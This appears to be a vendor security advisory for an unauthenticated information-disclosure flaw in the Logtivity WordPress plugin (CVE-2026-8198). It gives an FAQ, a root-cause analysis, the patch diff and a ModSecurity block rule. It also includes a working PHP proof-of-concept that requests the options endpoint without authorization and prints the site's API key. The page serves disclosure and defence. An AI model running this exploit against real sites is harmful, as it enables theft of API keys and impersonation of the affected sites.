What is CVE-2026-8198?

CVE-2026-8198 is a medium severity vulnerability in the Logtivity plugin for WordPress, affecting versions up to 3.3.6. It allows unauthenticated attackers to access sensitive configuration options via the REST API due to a logic flaw in the authorization method.

How does CVE-2026-8198 work?

The vulnerability arises from the verifyAuthorization method, which fails to properly validate requests without an Authorization header. This flaw allows attackers to bypass authentication and access the /wp-json/logtivity/v1/options endpoint, exposing sensitive data.

Who is affected by this vulnerability?

Any WordPress site using the Logtivity plugin version 3.3.6 or earlier is at risk. Administrators should check their plugin version to determine if they are affected by this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Logtivity plugin in your WordPress admin dashboard. If it is version 3.3.6 or earlier, your site is affected by CVE-2026-8198.

How can I fix CVE-2026-8198?

To fix the vulnerability, update the Logtivity plugin to version 3.3.7 or later, where the issue has been patched. Regularly updating plugins is a best practice for maintaining site security.

What if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Logtivity plugin until a patch can be applied. Additionally, restrict access to the REST API endpoint through server configurations or security plugins.

What does a CVSS score of 5.3 mean?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it is significant enough to warrant attention and remediation to prevent potential data exposure.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to unauthorized access to sensitive plugin configuration data, including the logtivity_site_api_key. This key could be used to impersonate the site and perform malicious actions via the Logtivity service.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can send a GET request to the vulnerable endpoint without an Authorization header. The server responds with sensitive information, illustrating the authentication bypass and the data exposure risk.

What should I do if I suspect my site has been exploited?

If you suspect exploitation, immediately review your site’s logs for unauthorized access, change your API keys, and consider restoring from a backup. It is also advisable to conduct a security audit to assess the extent of any breach.

Where can I find more information about CVE-2026-8198?

You can find more information about CVE-2026-8198 on the National Vulnerability Database or security advisories related to the Logtivity plugin. Additionally, following security blogs and forums can provide insights into ongoing vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 8, 2026

CVE-2026-8198: Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity <= 3.3.6 – Unauthenticated Information Disclosure via REST API (logtivity)

CVE ID CVE-2026-8198

Plugin logtivity

Severity Medium (CVSS 5.3)

CWE 200

Vulnerable Version 3.3.6

Patched Version 3.3.7

Disclosed May 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-8198:

This vulnerability allows unauthenticated information disclosure in the Logtivity plugin for WordPress (versions up to and including 3.3.6). The core logic flaw resides in the verifyAuthorization method. An attacker can bypass authentication by omitting the Authorization header entirely, causing the method to skip all Bearer token validation and return true unconditionally. This enables access to the /wp-json/logtivity/v1/options REST API endpoint and retrieval of sensitive configuration options, including the logtivity_site_api_key.

Root Cause: The verifyAuthorization method in logtivity/Core/Services/Logtivity_Rest_Endpoints.php (lines 71-106) accepted a string parameter $authHeader. If an HTTP request lacked the Authorization header, the parameter was not passed or was empty. The validation logic checked if a Bearer token could be parsed from $authHeader, but if no token existed, the code fell through to the return true statement at line 106. The method never explicitly rejected requests without a valid Authorization header. The try-catch block caught exceptions but the unconditional return true at the end always succeeded.

Exploitation: An unauthenticated attacker crafts a GET request to the WordPress REST API endpoint /wp-json/logtivity/v1/options. By sending a request with no Authorization header, the verifyAuthorization method receives a null or empty string. The token parsing logic fails (no Bearer token present), but instead of returning an error, the method returns true. This bypasses all authentication checks, exposing plugin options in the response body. A simple cURL command or HTTP request suffices.

Patch Analysis: The patch modifies the verifyAuthorization method signature to accept ?string $authHeader (allowing null). It adds an explicit check at the beginning: if ($authHeader == false) throws a new Exception(‘No authorization provided’). This ensures that any request without a valid Authorization header (null, empty, or false) is immediately rejected. The patch also adds an else branch for malformed headers. The unconditional return true is now only reached after successful Bearer token validation.

Impact: Successful exploitation allows unauthenticated attackers to read all plugin configuration options from the REST API response. The most critical exposed value is the logtivity_site_api_key, which can be used to impersonate the site in API calls to the Logtivity service. This could lead to further abuse, such as sending fraudulent activity logs or extracting additional data from the Logtivity backend. The CVSS score is 5.3 (Medium) due to the confidentiality impact and lack of authentication requirement.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/logtivity/Core/Services/Logtivity_Rest_Endpoints.php
+++ b/logtivity/Core/Services/Logtivity_Rest_Endpoints.php
@@ -71,14 +71,18 @@
     }

     /**
-     * @param string $authHeader
+     * @param ?string $authHeader
      *
      * @return true|WP_Error
      */
-    protected function verifyAuthorization(string $authHeader)
+    protected function verifyAuthorization(?string $authHeader)
     {
         if ($apikey = (new Logtivity_Options())->getApiKey()) {
             try {
+                if ($authHeader == false) {
+                    throw new Exception('No authorization provided');
+                }
+
                 $keys = explode(' ', $authHeader);
                 if (count($keys) == 2 && $keys[0] == 'Bearer') {
                     $payload = $this->parseToken($keys[1], $apikey);
@@ -102,6 +106,9 @@
                             )
                         );
                     }
+
+                } else {
+                    throw new Exception('Malformed header');
                 }

                 return true;
--- a/logtivity/functions/functions.php
+++ b/logtivity/functions/functions.php
@@ -76,11 +76,11 @@
     }

     /**
-     * @param int $postId
+     * @param ?int $postId
      *
      * @return string
      */
-    function logtivity_get_the_title(int $postId): string
+    function logtivity_get_the_title(?int $postId): string
     {
         $wpTexturize = remove_filter('the_title', 'wptexturize');

--- a/logtivity/logtivity.php
+++ b/logtivity/logtivity.php
@@ -5,7 +5,7 @@
  * Plugin URI:        https://logtivity.io
  * Description:       Record activity logs and errors logs across all your WordPress sites.
  * Author:            Logtivity
- * Version:           3.3.6
+ * Version:           3.3.7
  * Text Domain:       logtivity
  * Requires at least: 4.7
  * Requires PHP:      7.4
@@ -44,7 +44,7 @@
     /**
      * @var string
      */
-    protected string $version = '3.3.6';
+    protected string $version = '3.3.7';

     /**
      * Integrations with other plugins

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@beginsWith /wp-json/logtivity/v1/options" 
  "id:20261994,phase:2,deny,status:403,msg:'CVE-2026-8198 - Logtivity Unauthenticated Information Disclosure',severity:'CRITICAL',tag:'CVE-2026-8198'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-8198 - Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity <= 3.3.6 - Unauthenticated Information Disclosure via REST API

/**
 * Exploit: Requests the /wp-json/logtivity/v1/options endpoint without Authorization header.
 * The server returns plugin configuration, including the logtivity_site_api_key.
 */

// Configure target URL (change to the vulnerable WordPress site)
$target_url = 'http://example.com';  // Replace with the target WordPress site URL

// Endpoint that exposes plugin options
$endpoint = '/wp-json/logtivity/v1/options';

$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $target_url . $endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    // No Authorization header is sent intentionally
]);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  // Disable SSL verification for testing
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

curl_close($ch);

// Display results
echo "[*] CVE-2026-8198 PoC - Logtivity Unauthenticated Information Disclosuren";
echo "[*] Target: $target_url$endpointn";
echo "[*] HTTP Response Code: $http_coden";

if ($http_code == 200 && !empty($response)) {
    $data = json_decode($response, true);
    if ($data !== null) {
        echo "[+] Success! Retrieved plugin options:n";
        echo json_encode($data, JSON_PRETTY_PRINT) . "n";
        
        // Highlight sensitive key
        if (isset($data['logtivity_site_api_key'])) {
            echo "n[!] WARNING: Exposed logtivity_site_api_key: " . $data['logtivity_site_api_key'] . "n";
        }
    } else {
        echo "[!] Response is not valid JSON. Raw response:n$responsen";
    }
} elseif ($http_code == 403 || $http_code == 401) {
    echo "[-] The target appears patched or protected. Got HTTP $http_code.n";
} else {
    echo "[!] Unexpected HTTP code: $http_coden";
    echo "Response: $responsen";
}

Frequently Asked Questions

What is CVE-2026-8198?
Understanding the vulnerability
CVE-2026-8198 is a medium severity vulnerability in the Logtivity plugin for WordPress, affecting versions up to 3.3.6. It allows unauthenticated attackers to access sensitive configuration options via the REST API due to a logic flaw in the authorization method.
How does CVE-2026-8198 work?
Mechanism of exploitation
The vulnerability arises from the verifyAuthorization method, which fails to properly validate requests without an Authorization header. This flaw allows attackers to bypass authentication and access the /wp-json/logtivity/v1/options endpoint, exposing sensitive data.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the Logtivity plugin version 3.3.6 or earlier is at risk. Administrators should check their plugin version to determine if they are affected by this vulnerability.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Logtivity plugin in your WordPress admin dashboard. If it is version 3.3.6 or earlier, your site is affected by CVE-2026-8198.
How can I fix CVE-2026-8198?
Applying the necessary patch
To fix the vulnerability, update the Logtivity plugin to version 3.3.7 or later, where the issue has been patched. Regularly updating plugins is a best practice for maintaining site security.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider disabling the Logtivity plugin until a patch can be applied. Additionally, restrict access to the REST API endpoint through server configurations or security plugins.
What does a CVSS score of 5.3 mean?
Understanding risk levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it is significant enough to warrant attention and remediation to prevent potential data exposure.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability can lead to unauthorized access to sensitive plugin configuration data, including the logtivity_site_api_key. This key could be used to impersonate the site and perform malicious actions via the Logtivity service.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept shows how an attacker can send a GET request to the vulnerable endpoint without an Authorization header. The server responds with sensitive information, illustrating the authentication bypass and the data exposure risk.
What should I do if I suspect my site has been exploited?
Responding to potential breaches
If you suspect exploitation, immediately review your site’s logs for unauthorized access, change your API keys, and consider restoring from a backup. It is also advisable to conduct a security audit to assess the extent of any breach.
Where can I find more information about CVE-2026-8198?
Resources for further research
You can find more information about CVE-2026-8198 on the National Vulnerability Database or security advisories related to the Logtivity plugin. Additionally, following security blogs and forums can provide insights into ongoing vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations